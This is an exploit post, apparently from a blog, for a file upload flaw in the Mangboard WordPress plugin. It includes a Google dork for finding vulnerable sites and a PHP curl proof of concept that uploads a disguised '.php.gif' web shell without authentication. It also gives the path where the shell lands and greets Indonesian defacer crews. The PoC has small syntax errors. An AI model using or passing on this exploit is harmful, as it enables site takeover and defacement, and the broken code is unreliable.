Wordpress Mangboard Plugins File Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/mangboard/
# Date: 16-04-2017
# Exploit Author: Isal Dot ID
# Vendor Homepage: https://srd.wordpress.org/plugins/mangboard/
# Version: webapps
# Tested on: Windows 7
1. Description
You can upload files without acces as author
2. Proof of Concept
<?php
$uploadfile="yourfile.php.gif"; you can change php5 , phtml , php.fla etc
$ch = curl_init("http://127.0.0.1/wp-admin/admin-ajax.php?mode=basic&action=mb_uploader");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
atau pake CSRF Online : DISINI
isi Postname dengan = Filedata
Path shell : /wp-content/uploads/mangboard/years/month/random nomor/random_yourshell.php.gif
Greetz : Strlen - Jje Incovers - ReC0ded - Pak Haxor - Ice-cream - Panataran - ex-Sh1Ne - Malaikat_Galau - ViruzTomcat - AdrElite - Wonka - Sh0uT0u7 - l0c4lh34rtz - Zombie-Root - KONSLET
Thanks To : Sanjungan Jiwa Team - Indonesian Defacer Tersakiti - Jembut Loyality - IndoXploit - Suram Crew - Extreme Crew - Bahari Trouble Maker - Indonesian People
Post a Comment